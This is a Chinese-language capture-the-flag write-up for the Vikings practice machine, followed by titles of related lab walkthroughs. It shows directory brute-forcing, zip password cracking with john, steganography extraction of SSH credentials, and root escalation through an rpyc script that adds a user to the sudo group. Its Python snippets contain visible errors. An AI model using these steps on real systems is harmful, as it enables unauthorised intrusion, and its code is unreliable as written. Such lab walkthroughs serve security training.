1.常规端口服务侦探

2.用gubuster进行路径爆破,发现war下war-is-over新目录
gobuster dir -r -u http://10.0.2.16/ -x txt,html,php -w /usr/share/seclists/Discovery/Web-Content/common.txt

3.发现base64编码字符串,在cyberchef里面解码发现混乱无序
使用entro进行熵增探测发现熵值为7.9超过7.5证明是经过加密或压缩后的文件
侦探发现是一个zip压缩文件,下载保存后进行解压发现需要密码

4.使用john进行密码爆破
首先将文件保存成hash值zip2john a.zip >hash
将wordlists里的Rockyou字典解压保存到桌面
john hash --wordlists=rockyou.txt得到密码ragnarok123

5.发现解压后有图片文件,思考是否有隐写数,使用工具进行探测隐写
使用steghide工具进行探测 steghide info king但是发现又需要密码
使用binwalk进行二进制的分析,binwalk -B king发现存在压缩文件
查看后得到ssh账号密码尝试登录成功

6.查看readme文件里提示需要造船
boat文件里面给出提示是考拉兹猜想,进行质数查找,编写简单的素数判断程序
对第29个质数进行考拉兹计算后打印ASCII编码对应的字符串
n=0
for x in range (1000)
if x<2:
continute
h=int(x/2)+1
for i in range(2,h):
if x%i=0:
break
else:
n+=1
print(n,“:”,x)
进行考拉兹判断
i=109
c=[i]
while i≠1:
if i%2=1:
i=i%3+1
else:
i=i//2
if i<256:
c.append(i)
print©
mR)|>^/Gky[gz=.F#j5P(
7.将数字进行ASCII编码还原,将得到的字符串进行ssh登录,发现进入后进行自动sudo
先bin/bash -i 进行提权,查看运行脚本的文件,里面运用了rpyc远程管理
import rpyc
def shell():
import os
os.system(“sudo usermod -a -G sudo ragnar”)
conn = rpyc.classic.connect(“localhost”)
fn=conn.teleport(shell)
fn()

8.目标靶机上查看18812端口是否开启
ss -pantu | grep 18812发现开启,并且是本机127.0.0.1,所以代码需要在靶机上运行
运行脚本,升级shell ,/bin/bash

9.sudo -s成功提权到root权限,打靶完成

Vikings靶机打靶过程及思路相关推荐

  1. Tre靶机打靶过程及思路

    1.常规端口及服务发现 2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功 3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库 ...

  2. Hacker_kid靶机打靶过程及思路

    1.常规端口服务及侦探 2.发现9999存在python轻量级web开发框架tornado 3.怀疑udp53端口作为同一个域之间传输数据的方式,扫描发现存在udp53端口 sudo nmap -p5 ...

  3. Vegeta靶机打靶过程及思路

    1.常规端口扫描及发现 2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片 3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码 4.再 ...

  4. 渗透测试-靶机打靶思路与方法

    渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...

  5. 实弹打靶过程中有哪些注意事项

    在室内射击场中,实弹打靶和模拟影像打靶可以有效结合,是目前智能化靶场必备的训练配套设施.在室内射击场建设中,需要预留出模拟影像打靶设备的安装位置,并且实弹打靶和模拟影像射击训练不可同时进行. 在进行实 ...

  6. 【深度学习】模型训练过程可视化思路(可视化工具TensorBoard)

    [深度学习]模型训练过程可视化思路(可视化工具TensorBoard) 文章目录 1 TensorBoard的工作原理 2 TensorFlow中生成log文件 3 启动TensorBoard,读取l ...

  7. php %3c php 攻击,web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  8. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  9. Js黑客帝国效果 文字下落 制作过程和思路

    效果预览: http://jsfiddle.net/dtdxrk/m8R6b/embedded/result/ Js黑客帝国效果 文字向下落制作过程和思路 1.css控制文字竖显示 2.动态添加div ...

最新文章

  1. kubernetes apiserver认证
  2. 基于角色-功能-资源的权限控制模型的设计与实现-引子
  3. 全屏显示的包含webview的页面中弹出的软键盘覆盖输入框的问题
  4. Enlarge GCD CodeForces - 1034A(欧拉筛+最大公约数)
  5. matlab基本使用指南
  6. SQL Server内部的内存管理
  7. 错误代码: 1005 Can't create table 'hibernate.bill' (errno: 150)
  8. node.js安装以及git 的使用说明
  9. flash动画制作成品_Flash如何制作雪糕被吃掉的动画
  10. LNMP的安装(命令)
  11. 自我介绍Linux运维小白,运维面试自我介绍
  12. leetcode刷题之x的算术平方根
  13. 双向链表的结点增删细节(p->next->prior = s是啥意思,p->next->prior究竟代表下一个结点的prior指针还是p本身)
  14. Java后端验证苹果登录
  15. krita windows编译源码
  16. 英语差能学好Python吗?学Python有捷径吗?
  17. 深入了解 Animation Scripting 动画脚本
  18. 弱校联萌十一大决战之如日中天A Ariel【二进制+排序】
  19. 魔兽美服服务器维护,心得:美服12小时纯任务练级获服务器第一90级
  20. 编码器—解码器和注意力机制

热门文章

  1. 控制鼠标随机点击,电脑不锁屏!
  2. 盘口技术大全(七): 拉升
  3. python signal模块_Python2.7 signal
  4. String , StringBuilder , StringBuffer
  5. 计算机网络概述(我的笔记)
  6. 【渗透测试简介入门简介】
  7. Jenkins集成Sonar Qube
  8. laravel 验证email方法及注意 - 以及验证正则表达式的使用
  9. hd printer lexmark
  10. DOCTYPE和浏览器渲染模式